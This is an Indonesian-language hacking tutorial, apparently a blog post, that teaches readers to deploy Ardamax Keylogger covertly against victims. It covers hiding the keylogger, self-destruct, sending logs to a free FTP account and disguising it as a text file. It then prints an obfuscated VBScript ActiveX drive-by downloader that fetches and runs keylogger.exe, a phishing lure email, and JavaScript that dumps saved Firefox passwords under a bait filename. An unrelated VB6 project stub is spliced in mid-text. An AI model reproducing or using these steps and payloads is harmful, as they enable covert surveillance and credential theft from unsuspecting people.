Aplikasi Mata-mata ( Inteligent Aplication )

<!– @page { size: 21cm 29.7cm; margin: 2cm } P { margin-bottom: 0.21cm } –>

Keylogger adalah sebuah program/aplikasi yang dirancang untuk menyadap semua keystroke atau hasil yang diketikkan dari keyboard. Keyboard lalu mengirimkan informasi-informasi yang direkam tersebut ke email sang penyerang maupun di-upload langsung ke FTP yang telah ditentukan. Teknik keylogger sekarang telah mampu menyadap mouse click (klik dengan mouse), bahkan Keylogger Advance dirancang sedemikian rupa, sehingga hanya akan menyadap informasi-informasi penting saja, seperti username, id, password, IPIN – sesuatu yang akan kita bahas pada bagian berikutnya.

Dengan menggunakan API Call, keylogger modern dapat mengakses dan mengambil informasi yang ada pada beberapa jenis browser, sehingga memungkinkan penyadapan terhadap password. Keylogger Advance biasanya dirancang khusus untuk mengalahkan sistem keamanan Bank.

Saya menggunakan Ardamax Keylogger sebagai contoh. Anda bisa mendownloadnya di http://www.ardamax.com/keylogger/

Hal pertama yang perlu anda lakukan setelah Anda mendownload tentunya adalah melakukan instalasi. cara instalasinya sangat mudah, tinggal melakukan klik saja. Setelah menginstal, buka folder tempat di mana Anda menginstal program tersebut. Jika sukses terinstalasi, akan muncul sebuah ikon Ardamax di taskbar sebelah kanan. Klik kanan ikon tersebut dan pilih Option, dari situ kita akan melakukan konfigurasi terhadap keylogger ini.

Sekarang kita akan melakukan konfigurasi Ardamax Keylogger. Pada panel “invisibility” Anda bisa mengonfigurasi keylogger untuk dapat menyembunyikan ikon di sistem Tray, sembunyikan process di Task Manager, hapus semua shortcut dari Start Menu, hapus program dari daftar program yang terinstal (di control panel), sembunyikan program dari Windows Explorer, dan sembunyikan semua data di Start Up.

Yang perlu Anda lakukan hanya mengklik masing-masing Check Box yang disediakan. Jika ini adalah pertama kali Anda menggunakan keylogger (untuk bahan pembelajaran), Anda bisa melakukan centang pada pilihan ke-4 (remove the program from installation list). Namun lebih baik Anda tidak melakukan centang pada pilihan tersebut, karena akan memudahkan Anda untuk melakukan proses uninstall nantinya.

Pada pilihan menu “security”, Anda bisa melakukan beberapa konfigurasi, seperti melakukan proteksi terhadap Log File dan program daripada dihapus user. Selain itu, Anda juga bisa memberikan proteksi berupa password untuk menu Ardamax Keylogger. Namun jika hal ini Anda aktifkan, maka Anda perlu memasukkan password setiap kali ingin menjalankan kembali aplikasi Ardamax ini.

Pada bagian “Web Update”, Anda disarankan untuk tidak melakukan pemilihan apapun – Hal ini tentunya tidak akan berlaku untuk para jagoan pengguna keylogger Ardamax karena mereka lebih mengerti apa yang mereka lakukan.

Menu selanjutnya yang terdapat pada aplikasi tersebut adalah “Option”. Pada menu ini Anda dapat melakukan konfigurasi keylogger untuk dijalankan setiap saat Windows mengalami reboot, dan menjalankan keylogger dalam keadaan Hidden Mode – tidak terdeteksi. Pilihan Self Destruct merupakan pilihan untuk melakukan bunuh diri.

Oops, maksud saya keylogger akan melakukan bunuh diri (menghapus dirinya dari sistem komputer korban) pada tanggal yang ditentukan – hal ini terjadi secara otomatis tanpa Anda harus melakukan penghapusan program secara manual. Jika tidak dikonfigurasi, maka keylogger akan tetap ada di sistem tersebut selamanya, sampai adanya format ulang pada komputer korban.

Pilihan ini akan sangat berguna bagi Anda pada kondisi tertentu. Misalnya jika korban Anda adalah seorang yang memiliki sedikit pengetahuan di bidang IT, akan lebih baik jika melakukan penghapusan keylogger Anda, tepat setelah Anda mendapatkan semua informasi yang diinginkan. Sebab Anda tidak ingin penggunaan keylogger tersebut diketahui, bukan?

Selesai dengan kolom pilihan “General”. Sekarang kita akan melanjutkan pembicaraan ke kolom “Delivery”. Pada menu ini Anda dapat mengonfigurasi bagaimana catatan hasil pencurian akan dikirim atau disimpan, hal ini bisa dilakukan baik melalui email maupun FTP. Selain itu, pada bagian ini kita juga akan melihat beberapa konfigurasi penting lainnya.

Pada menu “Control”, Anda harus mencentang check box “Send logs every: ” dan isi berapa lama (dalam menit) log akan dikirimkan kepada Anda, setelah itu pilih media apa yang Anda inginkan untuk mengirimkan catatan hasil pencurian tersebut. Pada contoh ini, saya menggunakan FTP, jadi silakan Anda berkreasi sendiri pada aplikasi nyatanya. Pada pilihan “Send only if Log size exceed: ” silakan Anda membuat keputusan sendiri.

Jika Anda memilih pilihan tersebut, maka log (hasil pencatatan) akan dikirimkan, namun hanya jika ukuran log tersebut mencapai ukuran yang ditentukan. Tentunya jika Anda memilih pilihan pertama (Send logs every), log tetap akan dikirim sesuai waktu yang ditentukan, walaupun tidak mencapai ukuran yang ditentukan oleh Anda. Jika tidak mau ambil pusing, janganlah memilih.

Sekarang pergilah ke sebuah situs yang menyediakan layanan FTP gratisan. Untuk referensi, Anda bisa mencoba pergi ke beberapa situs ini:

http://freehostia.com

http://110mb.com

http://phpnet.us

Dan lain sebagainya.

Oke! Register sebuah account baru di salah satu situs tersebut. Tentunya terserah Anda, ingin mendaftar dengan nama apa saja dan password apa saja. Setelah sukses dengan proses registrasi, biasanya Anda akan dikirimkan sebuah email berisi data username dan password beserta account FTP Anda.

Jangan ditutup dulu! Karena kita akan segera membutuhkan email tersebut. Sebelum mempersiapkan hal yang lainnya, Anda harus membuat satu folder terlebih dahulu di remote folder FTP, Anda boleh menggunakan nama apa saja. Saya asumsikan nama folder yang akan Anda buat adalah “logs”. Jangan lupa untuk mengatur permission 777 ke folder “logs” tersebut. (Walau tidak ada kendala apapun, sebaiknya folder “logs” diset writable (saja).

Sekarang mari kita mengonfigurasi sedikit pengaturan FTP-nya.

Masukkan informasi account FTP Anda pada kolom yang telah disediakan. FTP host adalah URL FTP Anda, biasanya memiliki format seperti ftp.freeftphostinganda.com.

accountanda.freehostia.com. Pada Remote Folder, Anda hanya perlu memasukkan folder yang tadi sudah Anda buat dengan permission CHMOD 777 itu. Port dan Passive Mode dibiarkan default saja (karena kebanyakan FTP menggunakan port 21). Walaupun demikian, tetap ada kemungkinan penggunaan port lain, jika Anda tidak tahu dan/atau tidak pasti dengan port yang digunakan, biarkan saja tetap terpasang pada port 21).

Terakhir, isi username dan password FTP Anda. Setelah itu, Anda bisa mencoba menekan tombol Test yang ada pada bagian kanan atas tampilan program. Testing ini adalah sebuah test kecil yang perlu Anda lakukan untuk mengetahui sukses atau tidaknya hubungan dari keylogger (komputer korban) ke server FTP yang telah Anda pilih. Setelah melakukan testing tersebut, Anda akan menerima pemberitahuan jika koneksi FTP sukses.

Kolom menu selanjutnya adalah “Monitoring”. Pada menu Screen Shot, Anda dapat menentukan apakah keylogger akan merekam Screen Shot atau tidak. Jika tidak, kita akan melalui tahap ini.

Klik “OK”. Setelah itu, kita akan membuat penyamaran dari keylogger ini, sehingga menjadi lebih cantik dan agar tidak dicurigai korban kita. Hehehe.

Pertama, klik kanan ikon di taskbar dan pilih Remote Installation. Ardamax keylogger akan menampilkan semua konfigurasi yang tadi telah Anda buat. Pertama dan merupakan hal yang sangat penting adalah “Append Keylogger Engine to File or other Application”. Pilihlah file yang akan digunakan untuk menyamarkan keylogger Anda. Misalnya kita pilih “Cerita-super-lucu.txt”. Lalu lewati saja dua buah pilihan yang ada di bawahnya. Klik Next hingga pilihan “Keylogger Engine Path”.

Anda akan diperlihatkan semua konfigurasi yang tadinya telah Anda buat, Anda bisa mengubahnya sekarang. Jika tidak, maka silakan klik Next hingga mencapai kata Finish. Setelah itu, sebuah file keylogger engine yang disamarkan akan dihasilkan, tentunya dengan bentuk file text dan dengan nama “cerita-super-lucu.txt”.

Sekarang hampir semua telah siap kita siapkan. Tahap terakhir adalah menipu korban supaya membuka file instalasi keylogger ini. Ada beberapa cara yang bisa Anda lakukan, misalnya dengan kode pemrograman yang merugikan orang lain (malicious scr i pt), social engineering (seni penipuan), diinstal secara langsung, dan lain sebagainya. Saya serahkan hal itu sesuai imajinasi Anda. Hehehe.

Pada kesempatan kali ini saya akan memberikan dua buah contoh cara untuk menginstal keylogger pada komputer korban. Sebagai contoh, saya memberikan malicious code dalam bentuk ActiveX, dimana jika user membuka halaman situs yang telah kita sediakan, maka komputer korban akan secara otomatis melakukan instalasi keylogger. Tetapi hal ini hanya bisa sukses dilakukan pada para pengguna browser internet Explorer versi 7 ke bawah.

Keylogger ini pun bisa saja dideteksi dan dihapus secara otomatis oleh beberapa jenis antivirus tertentu. Akan tetapi kemungkinan suksesnya masih lumayan tinggi kok. Bagi mereka yang ingin memiliki tingkat kesuksesan tinggi, silakan membuat keylogger pribadi yang belum pernah diketahui oleh pihak developer anti virus manapun. Hehehe.

Berikut adalah malicious code yang bisa kalian gunakan:

<scr i pt language=”VBscr i pt”>

on error resume next

dl = “http://situsanda.com/keylogger.exe”

set df = document.createElement(”object”)

df.setAttribut “classid”,”clsid:BD96C556-65A3-11D0-983A-00C04FC29E36

str=”Microsoft.XMLHTTP”

Set x = df.CreateObject(str,””)

a1=”Ado”

a2=”db.”

a3=”Str”

a4=”eam”

str1=a1&a2&a3&a4

str5=str1

set S = df.createobject(str5,””)

S.type = 1

str6=”GET”

x.Open str6, dl, False

x.send

fname1=”keylogger.exe”

set F = df.createobject(”scr i pting.FileSystemObject”,””)

set tmp = F.BuildPath(tmp,fname1)

S.open

S.write x.responseBody

S.savetofile fname1,2

S.close

set Q = df.createobject(”Shell.Application”,””)

Q.ShellExecute fname1,””,””,”open”,0

</scr i pt>

Anda bisa menaruh kode di atas pada suatu halaman situs milik Anda. Untuk memberikan waktu yang cukup agar kode active X memiliki waktu yang cukup untuk melakukan download otomatis dan instalasi otomatis pada komputer korban Anda, buatlah halaman situs tersebut semenarik mungkin, mungkin dengan sedikit artikel atau tutorial komputer tertentu. Sebarkan halaman yang telah Anda buat tersebut ke berbagai mailing list ataupun forum agar dibuka oleh korban Anda ataupun orang-orang lain. Hehehe.

Mungkin pula dengan email yang berisikan informasi sebagai berikut:

Hi Friends,

Saya telah menemukan sebuah celah keamanan yang sangat kritikal pada sistem Yahoo Mail. Artikel selengkapnya dapat Anda lihat dan baca di http://yoursite.com/blabla.html

Nah dengan isi email tersebut, kemungkinan link tersebut diklik akan lebih tinggi (ini merupakan salah satu bentuk Social Engineering). Jika user melakukan klik pada hyperlink tersebut, dan jika browser yang ia gunakan rentan terhadap serangan, maka secara otomatis keylogger yang telah kita siapkan akan terinstal di komputer milik korban itu.

Ini adalah tahap terakhir yang perlu Anda lakukan, yaitu mengoleksi hasil! Hehehe. Silakan kunjungi FTP account Anda untuk melihat apakah ada log yang tersimpan. Jika ada, Anda bisa mendownloadnya dan membuka dnegan menggunakan Log Viewer yang tadi kita instal. Nah, tugas sudah selesai! Selamat, Anda telah berhasil dalam misi ini! Hehehe.

Project : prjPertama.vbp

Form : frmMain.frm

Modul : mdlMain.mdl

Kontrol penting:

– Textbox untuk menampung nama (Text1)

– Tombol untuk menampilkan nama (Command1)

– Label untuk menampilkan status (Label3) dengan properti Border Style bernilai 1 – Fixed Single.

Jika Anda menemui struktur seperti itu, artinya Anda harus membuat satu form, yang diberi nama frmMain. Silakan modifikasi sesuka Anda dengan cara mengubah nilai properti pada Properties Window. Yang terpenting adalah, form tersebut harus dimiliki kontrol-kontrol yang disebutkan, dalam contoh ini adalah textbox, label, dan command button (tombol).

Jangan lupa ada kontrol yang saya instruksikan untuk memberi nilai tertentu pada salah satu propertinya, yaitu dalam contoh ini properti BorderStyle-nya diset 1 – Fixed Single. Selain itu, tambahkan modul dari menu Project > Add Module, dan diberi nama mdlMain.

Technological Vulnerabilities

Rules Number Three – Never let technologies covering up all the Security aspect(s) of your online daily live, depending on it too much will makes you fall for some real stupid trap(s).

Menggantungkan diri dan mempercayakan semuanya pada teknologi dan peralatan yang ada, yang juga secara tidak langsung menggantungkan segala aspek keamanan informasi Anda kepada para developer dan pengelola suatu aplikasi dan/atau program, itu tidak dapat dibilang sebuah hal yang baik untuk dilakukan.

Beberapa contoh penggantungan diri terhadap teknologi adalah dengan mempercayai bahwa dengan terinstalnya Antivirus dan Firewall, maka Anda akan terhindar dari segala bentuk penyerangan. Hal ini secara sadar maupun tidak sadar sering kita lakukan.

Contoh yang akan dibahas pada bagian ini meliputi:

– Kepercayaan yang terlewat besar kepada para developer browser seperti Mozilla misalkan.

– Kepercayaan yang terlalu besar pada penggunaan Virtual Keyboard, sebagai alat bantu untuk menghindarkan diri Anda dari serangan sejenis keylogger.

Tanpa basa-basi mari langsung kita mulai….

Mozilla Firefox – Password Stealing Technique

Ada banyak program yang bisa membantu seorang penjahat untuk melakukan proses logging password Anda, seperti keylogger Ardamax yang sudah ditunjukkan pada bab sebelumnya, dan juga trojan. Namun bagaimana dengan sebuah file dalam bentuk *.html? Bisakah digunakan sebagai alat bantu pencurian password? Jawabannya bisa!

Memang sebuah kenyataan yang mengenaskan, di dunia internet ini hampir segala sesuatunya perlu dicurigai sebagai “pencuri password”, baik orang, file apapun, maupun situs dan proses apapun. Contoh yang sangat baik untuk menunjukkan hal tersebut adalah kenyataan bahwa file *.html yang sangat simpel ternyata bisa digunakan untuk mendapatkan berbagai informasi password yang sangat detail.

Bagaimana hal tersebut bisa terjadi? Mudah saja, seorang penyerang hanya perlu menyiapkan notepad dan mengisi notepad tersebut dengan scr i pt sebagai berikut:

<scr i pt>

document.write(’<img src=”http://www.th0r.info/products/Airliners2.JPG”><br><br>’);

setTimeout(”listPW()”,1000);

function listPW() {

if(document.location !=’http://www.th0r.info/hacks/hello.html’) (

netscape.security.PrivilegeManager.enablePrivilege(’UniversalXPConnect’);

var pm = Components.classes[“@mozilla.org/passwordmanager;1”].getService();

pm = pm.QueryInterface(Components.interface.nsIPasswordManager);

var enumerator = pm.enumerator;

document.writeln(’Mozilla\’s idea of security, Saya tidak menyimpan password apapun, it\’s only a PoC’);

document.writeln(’<br><br>’);

while (enumerator.hasMoreElements()) {

try {

var np = enumerator.getNext();

np = np.QueryInterface(Components.interface.nsIPassword);

presult = ‘[‘+np.user+’] [‘+np.password+’] [‘+np.host+’] <br>’;

document.writeln(presult);

}

catch(e) { }

}

}

else { alert(’Contoh ini, tidak melakukan penyimpanan password dalam bentuk apapun!’); }

}

</scr i pt>

Setelah itu melakukan “Save As” ke dalam notepad dan menyimpannya dengan nama yang menurut Anda dapat menarik perhatian korban Anda, misalnya: FreePornVideo.html.

Setelah memiliki file FreePornVideo.html tersebut, yang perlu Anda lakukan adalah melakukan testing, apakah pencurian password akan bekerja? Anda akan melakukan klik dua kali pada file FreePornVideo.html tersebut untuk melihat apakah teknik ini bekerja.

Pada saat Anda melakukan klik dua kali pada file tersebut, maka yang paling pertama akan Anda lihat adalah tampilan screen shot gambar http://www.airliners.de yang terkena serangan SQL Injection – ini adalah gambar yang ada pada http://www.th0r.info/products/Airliners2.JPG dan bisa Anda ubah menjadi gambar apapun sesuai dengan keinginan. Anda sangat baik apabila Anda memasukkan gambar yang sesuai dengan nama file HTML-nya untuk menghindari kecurigaan.

Kemudian, selang beberapa detik setelah gambar tersebut muncul maka akan ada kotak yang mengatakan kepada pengguna Firefox tersebut bahwa akan ada scr i pt yang dijalankan apabila Anda membuka file ini, yakinkah Anda untuk menjalankannya? Hahaha. Ini terjadi karena memang pada saat ditulisnya artikel ini, teknik ini sudah dipatch oleh pihak Mozilla, dan hal itu adalah bentuk penanggulangan yang mereka berikan.

Namun masih banyak cara di luar sana yang serupa dan masih bekerja pada saat artikel ini ditulis. Saya hanya tidak ingin dan tidak diperbolehkan oleh hati nurani saya untuk memasukkannya ke dalam artikel ini demi menghindari adanya kemelut dengan pihak Mozilla. Hahaha.

Akan muncul kotak dialog yang menyuruh kita untuk memilih dari dua pilihan pada saat file tersebut jalan. Pilih Allow untuk dapat melihat hasil yang akan ditunjukkan. Dan tadaaa… segala password yang pernah ada atau pernah digunakan pada Firefox tersebut bisa Anda lihat.

Mozilla’s ide of security, I do not store these passwords, it’s only a PoC

[Th0R][xxxxxxxxxxxx][http://sate.gamingsolution.org]

[Th0R][xxxxxx][http://z10.invisionfree.com]

[excodia][ads][http://192.168.0.1]

Maaf disensor, karena itu memang password asli saya, dan yang dibawah adalah password Router teman saya yang ada jauh di negeri antah berantah, jadi pada dasarnya tidak perlu saya tutup-tutupi. Hahaha.

Pada point ini, yang perlu Anda lakukan adalah meng-upload file *.html tersebut ke situs http://shinigami.byethost36.com/FreePornVideo.html (hanya contoh). Setelah itu Anda hanya perlu sedikit berjalan-jalan ke beberapa warnet tertentu, atau ke rumah teman Anda untuk kemudian menggunakan browser Firefox yang ada di sana dan menjalankannya.

Tentu Anda butuh sedikit modifikasi untuk dapat membuatnya berjalan seperti itu, sebab contoh tersebut hanya diperuntukkan bagi Anda yang melakukan percobaan pada komputer milik Anda sendiri. Hahahaha.

Dengan sedikit modifikasi lain juga, teknik ini bisa digunakan secara Remote. Arti dari Remote di sini adalah penggunaan jarak jauh, yakni Anda bisa melakukan pengaturan dengan modifikasi tertentu, yang akan membuat seseorang yang membuka halaman itu (tanpa Anda harus pergi ke tempat mereka dan menggunakan komputer mereka) hanya akan melihat tampilan gambar. Segala password tidak akan nampak pada diri mereka sendiri, namun Anda akan mendapatkannya dari email maupun file yang di-upload ke FTP Anda. Mudah bukan?

Mohon maaf sekali lagi, karena modifikasi yang saya maksudkan adalah teknik yang belum ter-patch total oleh Mozilla, karena itu saya tidak dapat membuka rahasianya di dalam artikel tutorial ini.

Atau mungkin, mereka yang memang niat melakukan pencurian hanya dengan berbekal informasi diatas, bisa saja pergi ke tempat teman, dengan membawa file FreePornVideo.html tadi secara manual dan melakukan klik secara manual juga di dalam PC lokal seperti pada contoh. Hahaha, dengan itu Anda tetap akan mendapatkan password dari korban Anda, hanya saja Anda membutuhkan akses langsung secara fisik ke komputer mereka. Tapi jangan dicoba yah ***\(^-^’)>

Iklan